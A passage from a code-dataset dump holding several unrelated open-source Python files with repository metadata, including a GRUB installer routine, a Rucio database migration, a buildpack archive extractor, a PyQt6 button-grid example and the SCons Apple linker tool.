plugins.mount_partition(copier.target, copier.lvm_target,
boot_partition, boot_folder)
boot_mounted_here = True
print(_("Updating Grub"))
grub_cfg = mount_loc + "boot/grub/grub.cfg"
old_perms = os.stat(grub_cfg)[0]
try:
with open(grub_cfg, "r+") as grubcfg:
cfg = grubcfg.read()
LOGGER.debug("UUID Dicts: " + str(copier.get_uuid_dict()))
final = device.multireplace(cfg, copier.get_uuid_dict())
grubcfg.seek(0)
grubcfg.write(final)
grubcfg.truncate()
grubcfg.flush()
finally:
os.chmod(grub_cfg, old_perms)
print(_("Installing Grub"))
grub_command = ["grub-install",
"--boot-directory=" + mount_loc + "boot",
"--recheck",
"--target=i386-pc", copier.target.device]
LOGGER.debug("Grub command: " + " ".join(grub_command))
grub_install = subprocess.Popen(grub_command,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
install_output, install_error = grub_install.communicate()
if grub_install.returncode != 0:
raise DeviceError(copier.target.device,
"Error installing grub.",
str(install_output,
"utf-8"))
print(_("Consider running update-grub on your backup. WereSync"
" copies can sometimes fail to capture all the nuances of a"
" complex system."))
print(_("Cleaning up."))
finally:
# This block cleans up any mounted partitions
if boot_mounted_here:
copier.target.unmount_partition(boot_partition)
if mounted_here:
copier.target.unmount_partition(root_partition)
print(_("Finished!"))
|
94a91e1402d22fd2405499c05d4bd63a67354dbb
|
6189f34eff2831e3e727cd7c5e43bc5b591adffc
|
/WebMirror/management/rss_parser_funcs/feed_parse_extractLnAddiction.py
|
a6e92bc8872250140f07f22680e3d2ede31d3062
|
[
"BSD-3-Clause"
] |
permissive
|
fake-name/ReadableWebProxy
|
24603660b204a9e7965cfdd4a942ff62d7711e27
|
ca2e086818433abc08c014dd06bfd22d4985ea2a
|
refs/heads/master
| 2023-09-04T03:54:50.043051
| 2023-08-26T16:08:46
| 2023-08-26T16:08:46
| 39,611,770
| 207
| 20
|
BSD-3-Clause
| 2023-09-11T15:48:15
| 2015-07-24T04:30:43
|
Python
|
UTF-8
|
Python
| false
| false
| 451
|
py
|
feed_parse_extractLnAddiction.py
|
def extractLnAddiction(item):
"""
# Ln Addiction
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or 'preview' in item['title'].lower():
return None
if ('Hissou Dungeon Unei Houhou' in item['tags'] or 'Hisshou Dungeon Unei Houhou' in item['tags']) and (chp or frag):
return buildReleaseMessageWithType(item, 'Hisshou Dungeon Unei Houhou', vol, chp, frag=frag, postfix=postfix)
return False
|
e4af2cf7af21db7a156ef80d842f59e6d42977df
|
3bba998ece193dd4594059025d0ebdc86a982e18
|
/lib/rucio/db/sqla/migrate_repo/versions/9a45bc4ea66d_add_vp_table.py
|
74351e2405bd3c09aa3bff6da3edd6d1e09c5575
|
[
"Apache-2.0"
] |
permissive
|
rucio/rucio
|
d3320db046866be616f534baecdfdb2b28c8d0f1
|
7f0d229ac0b3bc7dec12c6e158bea2b82d414a3b
|
refs/heads/master
| 2023-09-02T15:17:54.376456
| 2023-08-14T12:54:06
| 2023-08-21T12:42:21
| 109,819,364
| 232
| 378
|
Apache-2.0
| 2023-09-14T12:52:36
| 2017-11-07T10:15:12
|
Python
|
UTF-8
|
Python
| false
| false
| 1,962
|
py
|
9a45bc4ea66d_add_vp_table.py
|
# -*- coding: utf-8 -*-
# Copyright European Organization for Nuclear Research (CERN) since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' add VP table '''
import sqlalchemy as sa
from alembic import context
from alembic.op import create_primary_key, create_table, create_foreign_key, drop_table
from rucio.common.schema import get_schema_value
from rucio.db.sqla.types import JSON
# Alembic revision identifiers
revision = '9a45bc4ea66d'
down_revision = '739064d31565'
def upgrade():
'''
Upgrade the database to this revision
'''
if context.get_context().dialect.name in ['oracle', 'mysql', 'postgresql']:
create_table('virtual_placements',
sa.Column('scope', sa.String(get_schema_value('SCOPE_LENGTH'))),
sa.Column('name', sa.String(get_schema_value('NAME_LENGTH'))),
sa.Column('placements', JSON()),
sa.Column('created_at', sa.DateTime),
sa.Column('updated_at', sa.DateTime)
)
create_primary_key('VP_PK', 'virtual_placements', ['scope', 'name'])
create_foreign_key('VP_FK', 'virtual_placements', 'dids',
['scope', 'name'], ['scope', 'name'])
def downgrade():
'''
Downgrade the database to the previous revision
'''
if context.get_context().dialect.name in ['oracle', 'mysql', 'postgresql']:
drop_table('virtual_placements')
|
1a594ca6e89eabdb814125220a3a59f14149ac82
|
317814366a23277bea87ce6dde4441a53dbb9996
|
/lib/build_pack_utils/zips.py
|
e95b1911bede40c22ff041e0ac533dec1bc68738
|
[
"Apache-2.0"
] |
permissive
|
cloudfoundry/php-buildpack
|
c163ffbcc733aff454a349dbf2d64843c102ccbd
|
4bd55b99bafdf81864ed0b0014e064fc585ad7dd
|
refs/heads/master
| 2023-09-03T21:00:20.596401
| 2023-08-23T18:11:25
| 2023-08-23T18:12:02
| 15,767,202
| 140
| 464
|
Apache-2.0
| 2023-09-07T16:07:46
| 2014-01-09T13:19:03
|
Python
|
UTF-8
|
Python
| false
| false
| 9,325
|
py
|
zips.py
|
import os
import gzip
import bz2
import zipfile
import shutil
import logging
import tempfile
from functools import partial
from subprocess import Popen
from subprocess import PIPE
class UnzipUtil(object):
"""Extract files from compressed archives."""
def __init__(self, config):
self._ctx = config
self._log = logging.getLogger('zips')
def _unzip(self, zipFile, intoDir, strip):
"""Extract files from a zip archive.
Extract all of the files from the archive into the given
folder optionally stripping of the first element of the
path.
Ex: some/file/in/archive.txt -> intoDir/file/in/archive.txt
:param zipFile: full path to zip archive
:param intoDir: full path to root of extracted files
:param strip: trim leading element from path in archive
"""
if strip:
tmpDir = tempfile.mkdtemp(prefix='zips-')
else:
tmpDir = intoDir
zipIn = None
try:
zipIn = zipfile.ZipFile(zipFile, 'r')
zipIn.extractall(tmpDir)
if strip:
members = zipIn.namelist()
if len(members) > 0:
firstDir = members[0].split('/')[0]
if all([firstDir == m.split('/')[0] for m in members]):
moveFrom = os.path.join(tmpDir, firstDir)
if os.path.exists(moveFrom) and \
os.path.isdir(moveFrom):
for item in os.listdir(moveFrom):
shutil.move(os.path.join(moveFrom, item),
intoDir)
return intoDir
self._log.warn("Zip file does not need stripped")
for item in os.listdir(tmpDir):
shutil.move(os.path.join(tmpDir, item), intoDir)
return intoDir
finally:
if zipIn:
zipIn.close()
if intoDir != tmpDir and os.path.exists(tmpDir):
shutil.rmtree(tmpDir)
return intoDir
def _gunzip(self, zipFile, intoDir, strip):
"""Uncompress a gzip'd file.
:param zipFile: full path to gzip'd file
:param intoDir: full path to directory for uncompressed file
:param strip: ignored / not applicable
"""
path = os.path.join(intoDir, os.path.basename(zipFile)[:-3])
zipIn = None
try:
zipIn = gzip.open(zipFile, 'rb')
with open(path, 'wb') as zipOut:
for buf in iter(partial(zipIn.read, 8196), ''):
zipOut.write(buf)
finally:
if zipIn:
zipIn.close()
return path
def _bunzip2(self, zipFile, intoDir, strip):
"""Uncompress a bzip2'd file.
:param zipFile: full path to bzip2'd file
:param intoDir: full path to directory for uncompressed file
:param strip: ignore / not applicable
"""
path = os.path.join(intoDir, os.path.basename(zipFile)[:-4])
zipIn = None
try:
zipIn = bz2.BZ2File(zipFile, 'rb')
with open(path, 'wb') as zipOut:
for buf in iter(partial(zipIn.read, 8196), ''):
zipOut.write(buf)
finally:
if zipIn:
zipIn.close()
return path
def _tar_bunzip2(self, zipFile, intoDir, strip):
"""Extract files from a bzip2'd tar archive.
Extract all of the files from the archive into the given
folder optionally stripping of the first element of the
path.
Ex: some/file/in/archive.txt -> intoDir/file/in/archive.txt
:param zipFile: full path to bzip'd tar archive
:param intoDir: full path to root of extracted files
:param strip: set `--strip-components 1` argument to tar
"""
return self._tar_helper(zipFile, intoDir, 'bz2', strip)
def _tar_gunzip(self, zipFile, intoDir, strip):
"""Extract files from a gzip'd tar archive.
Extract all of the files from the archive into the given
folder optionally stripping of the first element of the
path.
Ex: some/file/in/archive.txt -> intoDir/file/in/archive.txt
:param zipFile: full path to gzip'd tar archive
:param intoDir: full path to root of extracted files
:param strip: set `--strip-components 1` argument to tar
"""
return self._tar_helper(zipFile, intoDir, 'gz', strip)
def _untar(self, zipFile, intoDir, strip):
"""Extract files from a tar archive.
Extract all of the files from the archive into the given
folder optionally stripping of the first element of the
path.
Ex: some/file/in/archive.txt -> intoDir/file/in/archive.txt
:param zipFile: full path to tar archive
:param intoDir: full path to root of extracted files
:param strip: set `--strip-components 1` argument to tar
"""
return self._tar_helper(zipFile, intoDir, None, strip)
def _tar_helper(self, zipFile, intoDir, compression, strip):
"""Uncompress and extract files from the archive.
Uncompress and extract all of the files from the archive into
the given folder, optionally stripping off the first element
of the path.
:param zipFile: full path to possibly compressed tar archive
:param intoDir: full path to root of extracted files
:param compression: type of compression (None, 'gz' or 'bz2')
:param strip: set `--strip-components 1` argument to tar
"""
# build command
cmd = []
if compression == 'gz':
cmd.append('gunzip -c %s' % zipFile)
elif compression == 'bz2':
cmd.append('bunzip2 -c %s' % zipFile)
if strip:
if compression is None:
cmd.append('tar xf %s --strip-components 1' % zipFile)
else:
cmd.append('tar xf - --strip-components 1')
else:
if compression is None:
cmd.append('tar xf %s' % zipFile)
else:
cmd.append('tar xf -')
command = (len(cmd) > 1) and ' | '.join(cmd) or ''.join(cmd)
# run it
cwd = os.getcwd()
try:
if not os.path.exists(intoDir):
os.makedirs(intoDir)
os.chdir(intoDir)
if os.path.exists(zipFile):
proc = Popen(command, stdout=PIPE, shell=True)
output, unused_err = proc.communicate()
retcode = proc.poll()
if retcode:
raise RuntimeError("Extracting [%s] failed with code [%d]"
% (zipFile, retcode))
finally:
os.chdir(cwd)
return intoDir
def _pick_based_on_file_extension(self, zipFile):
"""Pick extraction method based on file extension.
:param zipFile: archive to extract
"""
if zipFile.endswith('.tar.gz') or zipFile.endswith('.tgz'):
return self._tar_gunzip
if zipFile.endswith('.tar.bz2'):
return self._tar_bunzip2
if zipFile.endswith('.tar'):
return self._untar
if zipFile.endswith('.gz'):
return self._gunzip
if zipFile.endswith('.bz2'):
return self._bunzip2
if zipFile.endswith('.zip') and zipfile.is_zipfile(zipFile):
return self._unzip
if zipFile.endswith('.war') and zipfile.is_zipfile(zipFile):
return self._unzip
if zipFile.endswith('.jar') and zipfile.is_zipfile(zipFile):
return self._unzip
def extract(self, zipFile, intoDir, strip=False, method=None):
"""Extract files from the archive.
Extract all of the files from the given archive. Files are
placed into the directory specified. Optionally, the leading
element of the path used by the files in the archive can be
stripped off.
By default, the method will decicde how to extract the files
based on the file extension. If you need to manually instruct
it how to extract the files, you can pass in a helper method.
Helper methods would generally be one of these methods, which
are available on this class.
* _untar
* _tar_gunzip
* _tar_bunzip2
* _bunzip2
* _gunzip
* _unzip
However you can pass in any method that you like, which is
convenient if you need to extract files from an unsupported
archive type.
:param zipFile: full path to archive file
:param intoDir: full path to root of extracted files
:param strip: strip leading element of archive path
(Default value = False)
:param method: method used to extract files from archive
(Default value = None)
"""
self._log.info("Extracting [%s] into [%s]", zipFile, intoDir)
if not method:
method = self._pick_based_on_file_extension(zipFile)
return method(zipFile, intoDir, strip)
|
fbedded06b14d50134fd9049c6de58dfce0a7a99
|
a4269b96a9eba49bbe692733d6777ec1917ef629
|
/semana-04/scripts/3-eventos-y-señales-ejemplo_1.py
|
ead3bab58740119072f457a54207556ad6a66527
|
[] |
no_license
|
IIC2233/contenidos
|
7bbc687c10d5fa2f394891507cf733f24b14080f
|
ee49033e3aa382f1dcbd03004601a7c084f824ab
|
refs/heads/main
| 2023-08-29T10:15:56.430976
| 2023-08-22T04:35:17
| 2023-08-22T04:37:00
| 286,314,095
| 118
| 193
| null | 2020-10-13T16:55:19
| 2020-08-09T20:45:00
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,311
|
py
|
3-eventos-y-señales-ejemplo_1.py
|
import sys
from PyQt6.QtWidgets import (QApplication, QWidget, QPushButton, QLabel,
QGridLayout, QVBoxLayout)
class MiVentana(QWidget):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.init_gui()
def init_gui(self):
self.label1 = QLabel('Status:', self)
self.grilla = QGridLayout()
valores = ['1', '2', '3',
'4', '5', '6',
'7', '8', '9',
'0', 'CE', 'C']
posiciones = [(i, j) for i in range(4) for j in range(3)]
for posicion, valor in zip(posiciones, valores):
boton = QPushButton(valor, self)
"""
Aquí conectamos el evento clicked() de cada boton con el slot
correspondiente. En este ejemplo todos los botones usan el
mismo slot (self.boton_clickeado).
"""
boton.clicked.connect(self.boton_clickeado)
self.grilla.addWidget(boton, *posicion)
vbox = QVBoxLayout()
vbox.addWidget(self.label1)
vbox.addLayout(self.grilla)
self.setLayout(vbox)
self.move(300, 150)
self.setWindowTitle('Calculator')
def boton_clickeado(self):
"""
Esta función se ejecuta cada vez que uno de los botones de la grilla
es presionado. Cada vez que el botón genera el evento, la función inspecciona
cual botón fue presionado y recupera la posición en que se encuentra en
la grilla.
"""
# Sender retorna el objeto que fue clickeado.
# Ahora, la variable boton referencia una instancia de QPushButton
boton = self.sender()
# Obtenemos el identificador del elemento en la grilla
idx = self.grilla.indexOf(boton)
# Con el identificador obtenemos la posición del ítem en la grilla
posicion = self.grilla.getItemPosition(idx)
# Actualizamos label1
self.label1.setText(f'Status: Presionado boton {idx}, en fila/columna: {posicion[:2]}.')
if __name__ == '__main__':
def hook(type, value, traceback):
print(type)
print(traceback)
sys.__excepthook__ = hook
app = QApplication([])
form = MiVentana()
form.show()
sys.exit(app.exec())
|
f44c0e93d0e91d3264847c1af7b7bacd366d5176
|
04f5e5e2536f05f5dfeff9747322f85b0c62886b
|
/experiments/661k_genomes/scan_genomes_minmers.py
|
5d1f32aea0753c81fffc168c0286b73a74d41372
|
[
"MIT"
] |
permissive
|
ekimb/rust-mdbg
|
dba6355580ef019b5b65d6ccece445afe45157ca
|
985ba674f9da0ff440b0330fd1e2b1de92226305
|
refs/heads/master
| 2023-05-12T04:47:17.340513
| 2023-01-12T10:14:00
| 2023-01-12T11:05:47
| 310,619,686
| 163
| 14
|
MIT
| 2022-02-22T17:37:39
| 2020-11-06T14:29:44
|
Rust
|
UTF-8
|
Python
| false
| false
| 2,640
|
py
|
scan_genomes_minmers.py
|
""" purpose: scans stdin for kminmers found in a reference file
stdin format: [seq_id] [list of minimizers]
reference file: many lines, each line is: [seq_id] [list of minimizers to extract kminmers from]
"""
import sys
genome_minspace_filename = sys.argv[1]
k=10
graph_mode = "-g" in sys.argv
from collections import defaultdict
kminmers = defaultdict(list)
#kminmers_sets = set()
for line in open(genome_minspace_filename):
line = line.replace('[','').replace(']','').replace(',','')
ls = line.split()
seq_id = ls[0]
minimizers = tuple(map(int,ls[1:]))
if len(minimizers) < k: continue
for i in range(len(minimizers)-k+1):
kminmer = minimizers[i:i+k]
kminmers[kminmer] += [(seq_id,i)]
kminmers[kminmer[::-1]] += [(seq_id,i)]
#kminmers_sets.add(set(kminmer))
assert(len(kminmer)==10)
# hack for speed
kminmer_str = str(list(kminmer))
kminmer_str_inv = str(list(kminmer[::-1]))
#print(kminmer_str,kminmer_str_inv)
kminmers[kminmer_str] += [(seq_id,i)]
kminmers[kminmer_str_inv] += [(seq_id,i)]
if graph_mode:
for line in sys.stdin:
if line[0] == "#": continue
# 16606 [27472887960080780, 26945328166221359, 83024137861838436, 183455804785478733, 54911163836344167, 170342695321694208, 91112118779713090, 54911163836344167, 83024137861838436, 183455804785478733] GCCGAGAGGCTGAAGGCGCTCCCCTGCTAAGGGAGTATGCGGTCAA AAGCTGCATCCGGGGTTCGAATCCCCGCCTCACCGCCATTTGCATCCGTAGCTCAGCTGGATAGAGTACTCGGCTACGAACCGAGCGGTCGGAGGTTCGAATCCTCCCGGATGCACCATATTCTACGTACTTTCAGCGATGAAGGTATGGAAGAGGTGGCGGTATAACCGCAGGCACCAGGGAGGATAACGTTGCTTTAGCAACGGCCCGAAGGGCGAGCCGCAAGGCGAGTAATCCTCCCGGATGCACCATCT CTTACTTGATATGGCTTTAGTAGCGATATCAATATCAGCAGTAAAATAAATTTTCCCGATGCATCCGTAGCTCAGCTGGATAGAGTACTCGGCTACGAACCGAGCGGTC * * (24, 33)
ls = line.split()
#kminmer = tuple(eval(" ".join(ls[1:k+1])))
kminmer = " ".join(ls[1:k+1])
if kminmer in kminmers:
print("*","*",kminmers[kminmer] + kminmers[kminmer[::-1]])
else:
for line in sys.stdin:
if ":" in line or "Parsing" in line: continue # debug stuff output by mdbg
ls = line.split()
seq_id, minimizers = ls[0], tuple(map(int,ls[1:]))
for i in range(len(minimizers)-k+1):
kminmer = minimizers[i:i+k]
if kminmer in kminmers or kminmer[::-1] in kminmers:
#print("hit!",seq_id,"at pos",i,"found in ref(s)",kminmers[kminmer] + kminmers[kminmer[::-1]])
print(seq_id,i,kminmers[kminmer] + kminmers[kminmer[::-1]])
|
b550ff5fdac059bc0e583bc3d3230fc20e2d91c6
|
3db48713c39b90d5967615e3d1c874d88055ba70
|
/tests/utils/stl-lit/stl-lit.in
|
c9c28dc1fce8ab7f791bc6636659ee8c1cef3900
|
[
"Apache-2.0",
"LLVM-exception",
"LicenseRef-scancode-object-form-exception-to-mit",
"LicenseRef-scancode-unicode",
"MIT",
"LicenseRef-scancode-mit-old-style",
"LicenseRef-scancode-other-permissive",
"CC0-1.0",
"BSL-1.0",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
microsoft/STL
|
4b1a6a625402e04b857e8dfc3c22efd9bc798f01
|
6c69a73911b33892919ec628c0ea5bbf0caf8a6a
|
refs/heads/main
| 2023-09-04T08:50:17.559497
| 2023-08-31T16:49:43
| 2023-08-31T16:49:43
| 204,593,825
| 9,862
| 1,629
|
NOASSERTION
| 2023-09-14T21:57:47
| 2019-08-27T01:31:18
|
C++
|
UTF-8
|
Python
| false
| false
| 1,016
|
in
|
stl-lit.in
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#===----------------------------------------------------------------------===##
#
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
#===----------------------------------------------------------------------===##
import os
import sys
config_map = {}
def map_config(source_dir, site_config):
global config_map
source_dir = os.path.realpath(source_dir)
source_dir = os.path.normcase(source_dir)
site_config = os.path.normpath(site_config)
config_map[source_dir] = site_config
# Make sure we can find the lit package.
sys.path.insert(0, os.path.join("@LLVM_SOURCE_DIR@", 'utils', 'lit'))
@STL_LIT_CONFIG_MAP@
builtin_parameters= {}
builtin_parameters['config_map'] = config_map
if __name__=='__main__':
from lit.main import main
main(builtin_parameters)
|
e869c5d3f81bf03134a538e8647d517b767a9ac0
|
dcbef06d5a00f07756339b9e62c684dec2fee425
|
/nuitka/build/inline_copy/lib/scons-3.1.2/SCons/Tool/applelink.py
|
f432d613b3e97176cdc8edadf4220f1c33f47444
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
Nuitka/Nuitka
|
f9543d8d95bfa0b81d4e60af0dfad99fb72893a4
|
d87faf2f7e1d6ed9bfe4cf8c1d648f34307e33f2
|
refs/heads/develop
| 2023-08-28T14:00:32.861328
| 2023-08-27T09:16:45
| 2023-08-27T09:16:45
| 9,626,741
| 8,573
| 599
|
Apache-2.0
| 2023-09-13T02:49:41
| 2013-04-23T15:40:33
|
Python
|
UTF-8
|
Python
| false
| false
| 8,618
|
py
|
applelink.py
|
"""SCons.Tool.applelink
Tool-specific initialization for Apple's gnu-like linker.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2019 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/applelink.py bee7caf9defd6e108fc2998a2520ddb36a967691 2019-12-17 02:07:09 bdeegan"
import SCons.Util
# Even though the Mac is based on the GNU toolchain, it doesn't understand
# the -rpath option, so we use the "link" tool instead of "gnulink".
from . import link
class AppleLinkInvalidCurrentVersionException(Exception):
pass
class AppleLinkInvalidCompatibilityVersionException(Exception):
pass
def _applelib_versioned_lib_suffix(env, suffix, version):
"""For suffix='.dylib' and version='0.1.2' it returns '.0.1.2.dylib'"""
Verbose = False
if Verbose:
print("_applelib_versioned_lib_suffix: suffix={!r}".format(suffix))
print("_applelib_versioned_lib_suffix: version={!r}".format(version))
if version not in suffix:
suffix = "." + version + suffix
if Verbose:
print("_applelib_versioned_lib_suffix: return suffix={!r}".format(suffix))
return suffix
def _applelib_versioned_lib_soname(env, libnode, version, prefix, suffix, name_func):
"""For libnode='/optional/dir/libfoo.X.Y.Z.dylib' it returns 'libfoo.X.dylib'"""
Verbose = False
if Verbose:
print("_applelib_versioned_lib_soname: version={!r}".format(version))
name = name_func(env, libnode, version, prefix, suffix)
if Verbose:
print("_applelib_versioned_lib_soname: name={!r}".format(name))
major = version.split('.')[0]
(libname,_suffix) = name.split('.')
soname = '.'.join([libname, major, _suffix])
if Verbose:
print("_applelib_versioned_lib_soname: soname={!r}".format(soname))
return soname
def _applelib_versioned_shlib_soname(env, libnode, version, prefix, suffix):
return _applelib_versioned_lib_soname(env, libnode, version, prefix, suffix, link._versioned_shlib_name)
# User programmatically describes how SHLIBVERSION maps to values for compat/current.
_applelib_max_version_values = (65535, 255, 255)
def _applelib_check_valid_version(version_string):
"""
Check that the version # is valid.
X[.Y[.Z]]
where X 0-65535
where Y either not specified or 0-255
where Z either not specified or 0-255
:param version_string:
:return:
"""
parts = version_string.split('.')
if len(parts) > 3:
return False, "Version string has too many periods [%s]"%version_string
if len(parts) <= 0:
return False, "Version string unspecified [%s]"%version_string
for (i, p) in enumerate(parts):
try:
p_i = int(p)
except ValueError:
return False, "Version component %s (from %s) is not a number"%(p, version_string)
if p_i < 0 or p_i > _applelib_max_version_values[i]:
return False, "Version component %s (from %s) is not valid value should be between 0 and %d"%(p, version_string, _applelib_max_version_values[i])
return True, ""
def _applelib_currentVersionFromSoVersion(source, target, env, for_signature):
"""
A generator function to create the -Wl,-current_version flag if needed.
If env['APPLELINK_NO_CURRENT_VERSION'] contains a true value no flag will be generated
Otherwise if APPLELINK_CURRENT_VERSION is not specified, env['SHLIBVERSION']
will be used.
:param source:
:param target:
:param env:
:param for_signature:
:return: A string providing the flag to specify the current_version of the shared library
"""
if env.get('APPLELINK_NO_CURRENT_VERSION', False):
return ""
elif env.get('APPLELINK_CURRENT_VERSION', False):
version_string = env['APPLELINK_CURRENT_VERSION']
elif env.get('SHLIBVERSION', False):
version_string = env['SHLIBVERSION']
else:
return ""
version_string = ".".join(version_string.split('.')[:3])
valid, reason = _applelib_check_valid_version(version_string)
if not valid:
raise AppleLinkInvalidCurrentVersionException(reason)
return "-Wl,-current_version,%s" % version_string
def _applelib_compatVersionFromSoVersion(source, target, env, for_signature):
"""
A generator function to create the -Wl,-compatibility_version flag if needed.
If env['APPLELINK_NO_COMPATIBILITY_VERSION'] contains a true value no flag will be generated
Otherwise if APPLELINK_COMPATIBILITY_VERSION is not specified
the first two parts of env['SHLIBVERSION'] will be used with a .0 appended.
:param source:
:param target:
:param env:
:param for_signature:
:return: A string providing the flag to specify the compatibility_version of the shared library
"""
if env.get('APPLELINK_NO_COMPATIBILITY_VERSION', False):
return ""
elif env.get('APPLELINK_COMPATIBILITY_VERSION', False):
version_string = env['APPLELINK_COMPATIBILITY_VERSION']
elif env.get('SHLIBVERSION', False):
version_string = ".".join(env['SHLIBVERSION'].split('.')[:2] + ['0'])
else:
return ""
if version_string is None:
return ""
valid, reason = _applelib_check_valid_version(version_string)
if not valid:
raise AppleLinkInvalidCompatibilityVersionException(reason)
return "-Wl,-compatibility_version,%s" % version_string
def generate(env):
"""Add Builders and construction variables for applelink to an
Environment."""
link.generate(env)
env['FRAMEWORKPATHPREFIX'] = '-F'
env['_FRAMEWORKPATH'] = '${_concat(FRAMEWORKPATHPREFIX, FRAMEWORKPATH, "", __env__, RDirs)}'
env['_FRAMEWORKS'] = '${_concat("-framework ", FRAMEWORKS, "", __env__)}'
env['LINKCOM'] = env['LINKCOM'] + ' $_FRAMEWORKPATH $_FRAMEWORKS $FRAMEWORKSFLAGS'
env['SHLINKFLAGS'] = SCons.Util.CLVar('$LINKFLAGS -dynamiclib')
env['SHLINKCOM'] = env['SHLINKCOM'] + ' $_FRAMEWORKPATH $_FRAMEWORKS $FRAMEWORKSFLAGS'
# see: http://docstore.mik.ua/orelly/unix3/mac/ch05_04.htm for proper naming
link._setup_versioned_lib_variables(env, tool = 'applelink')#, use_soname = use_soname)
env['LINKCALLBACKS'] = link._versioned_lib_callbacks()
env['LINKCALLBACKS']['VersionedShLibSuffix'] = _applelib_versioned_lib_suffix
env['LINKCALLBACKS']['VersionedShLibSoname'] = _applelib_versioned_shlib_soname
env['_APPLELINK_CURRENT_VERSION'] = _applelib_currentVersionFromSoVersion
env['_APPLELINK_COMPATIBILITY_VERSION'] = _applelib_compatVersionFromSoVersion
env['_SHLIBVERSIONFLAGS'] = '$_APPLELINK_CURRENT_VERSION $_APPLELINK_COMPATIBILITY_VERSION '
env['_LDMODULEVERSIONFLAGS'] = '$_APPLELINK_CURRENT_VERSION $_APPLELINK_COMPATIBILITY_VERSION '
# override the default for loadable modules, which are different
# on OS X than dynamic shared libs. echoing what XCode does for
# pre/suffixes:
env['LDMODULEPREFIX'] = ''
env['LDMODULESUFFIX'] = ''
env['LDMODULEFLAGS'] = SCons.Util.CLVar('$LINKFLAGS -bundle')
env['LDMODULECOM'] = '$LDMODULE -o ${TARGET} $LDMODULEFLAGS $SOURCES $_LIBDIRFLAGS $_LIBFLAGS $_FRAMEWORKPATH $_FRAMEWORKS $FRAMEWORKSFLAGS'
env['__SHLIBVERSIONFLAGS'] = '${__libversionflags(__env__,"SHLIBVERSION","_SHLIBVERSIONFLAGS")}'
def exists(env):
return env['PLATFORM'] == 'darwin'
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
07a5c8b26b300f79a0570d6ca9e7a9d5b89f13df
|
de84a9c84e9fd00fb1cf52c69381b20c96463f2b
|
/proselint/checks/misc/scare_quotes.py
|
4c5fa8048d70efb9b3bfd66372ffb8fea9a4f650
|
[
"BSD-3-Clause"
] |
permissive
|
amperser/proselint
|
23b7b1a0963bf036dde9326b3bb0bbbfcdf26c61
|
b5b7536bec5fd461e45cacad87c2aab9ea33ac35
|
refs/heads/main
| 2023-08-11T08:45:59.641463
| 2023-07-27T13:28:58
| 2023-07-27T13:28:58
| 29,220,809
| 4,513
| 267
|
BSD-3-Clause
| 2023-09-10T20:53:11
| 2015-01-14T01:24:07
|
Python
|
UTF-8
|
Python
| false
| false
| 554
|
py
|
scare_quotes.py
|
"""Misuse of scare quotes.
---
layout: post
source: Pinker's book on writing
source_url: ???
title: misuse of scare quotes
date: 2014-06-10 12:31:19
categories: writing
---
Points out misuse of scare quotes.
"""
from proselint.tools import existence_check, memoize
@memoize
def check(text):
"""Suggest the preferred forms."""
err = "pinker.scare_quotes"
msg = "Misuse of 'scare quotes'. Delete them."
narcissism = [
"the 'take-home message'",
]
return existence_check(text, narcissism, err, msg)
|
aac1bd411cbdb2b37b60c8f8cfed2cc0b00e0aed
|
9da4adae4c389e84097a0da9bfce40f9132eef96
|
/pygame_menu/utils.py
|
c10c0ae245046d2bb22c8779c8b55193722af611
|
[
"MIT"
] |
permissive
|
ppizarror/pygame-menu
|
f8fd2ff3acefad25b07e19499a2dfebd50507403
|
bcfaccbb11d4a6ecba588eec2851932dc46c2337
|
refs/heads/master
| 2023-07-07T10:38:09.651797
| 2023-06-28T18:00:25
| 2023-06-28T18:00:25
| 89,940,842
| 570
| 207
|
NOASSERTION
| 2023-08-19T19:17:59
| 2017-05-01T16:26:50
|
Python
|
UTF-8
|
Python
| false
| false
| 39,971
|
py
|
utils.py
|
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
UTILS
Utility functions.
"""
__all__ = [
# Methods
'assert_alignment',
'assert_color',
'assert_cursor',
'assert_list_vector',
'assert_orientation',
'assert_position',
'assert_position_vector',
'assert_vector',
'check_key_pressed_valid',
'fill_gradient',
'format_color',
'get_cursor',
'get_finger_pos',
'load_pygame_image_file',
'make_surface',
'mouse_motion_current_mouse_position',
'parse_padding',
'print_menu_widget_structure',
